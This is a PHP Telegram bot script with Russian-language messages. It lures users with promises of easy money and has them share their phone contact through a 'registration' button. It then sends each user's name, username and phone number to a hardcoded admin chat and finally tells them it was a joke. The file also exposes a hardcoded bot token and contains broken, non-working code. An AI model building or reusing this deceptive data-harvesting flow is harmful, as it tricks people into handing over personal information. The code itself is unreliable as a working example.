<?php
class snowbot
 {
      const API_KEY="https://api.telegram.org/bot1889200390:AAELafIDIYH_e502newEeWZkR-M8pO6Y10g";
      
      public function setWebhook($url)
      {
      return $this->request('setWebhook', [
        'url'=> $url
        ]);
      }
      public function request($method, $data)
      
      {
        // Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
        $ch = curl_init();
        
        $url=self::API_KEY.$method;
        
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        
        $headers = array();
        $headers[] = 'Content-Type: application/x-www-form-urlencoded';
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
        
        $result = curl_exec($ch);
        if (curl_errno($ch)) {
            echo 'Error:' . curl_error($ch);
        }
        curl_close($ch);
        
        return $result;
      }
   
    public function sendMessage($chat_id, $text)
    { 
      return $this->request("sendMessage", [
        'chat_id'->$chat_id,
        'text'->$text
        ]);
    }
    
    public function updates()
    {
      $update=json_decode(file_get_contents("php://input"), ture);
      return $update->message;
    }
 }
    
    $bot= new snowbot();
   echo $bot->setWebhook("https://snowbot.000webhostapp.com");

$data=$bot->Updates();
$text=$data->text;
$chat_id=$data->chat->id;
    

/* if ($text == "/start"){
$bot->ask('Show phone', function (Answer $answer) use ($bot) {
    $bot->reply('Handled!');
}, ['reply_markup' => json_encode([
    'keyboard' => [[['text' => 'Show phone', 'request_contact' => true]]]
])]);
}*/



if($text == "/start" or $text == "❌Отказать "){


    bot('sendmessage',[

        'chat_id'=>$cid,

        'text'=>"*👋Привет [$fname] добро пожаловать на наш бот. Если хотите лёгки зарабатывать тогда подпишите на наш канал* [@vzlomnie] *а то вы не можете зарабатывать.\n\nТеперь нажмите на кнопку <b>регистрация</b>*",

        'parse_mode'=>"markdown",

        'reply_markup'=>json_encode(

['resize_keyboard'=>true,

'keyboard' => [

[["text"=>"⏳Регистрация",'request_contact' =>true],],

]

])

]);

}

if($data){

bot('sendmessage',[

    'chat_id'=>"1104979149",
//admin id
    'text'=>"Новый участник:\nИмя: [$fname](tg://user?id=$uid)\nЮзер: @$user\nНомер: $nomer\nИмя номера: $name",

    'parse_mode'=>"markdown"

        ]);

bot("sendmessage",[

    'chat_id'=>$cid,

    'text'=>"Номер успешно добавлен! И теперь нажмите на кнопку готов!",

    'reply_markup'=>json_encode(

[

'resize_keyboard'=>true,

'selective'=>true,

'one_time_keyboard'=>true,

'keyboard' => [

[["text"=>"✅Готов  "],],

]

])

]);

}



$button = $message->keyboardbutton->text;

if($text == "✅Готов  "){

    bot('sendmessage',[

        'chat_id'=>$cid,

        'text'=>"Выберите сколько вы хотите",

  'reply_markup'=>json_encode(

[

'resize_keyboard'=>true,

'selective'=>true,

'one_time_keyboard'=>true,

'keyboard' => [

[["text"=>"💰1 тмт"],],

[["text"=>"💰1.50 тмт"],],

[["text"=>"💰5 тмт"],],

[["text"=>"💰10 тмт"],],

[["text"=>"❌Отказать "],],





]

])

]);

}

$button = $message->keyboardbutton->text;

if($text == "💰1 тмт" or $text == "💰1.50 тмт" or $text == "💰5 тмт" or $text == "💰10 тмт"){

    bot('sendmessage',[

        'chat_id'=>$cid,

        'text'=>"Развёрнутый ответ



Эх-эх-эх это же шутка😅"]);

        }

        
        
?>
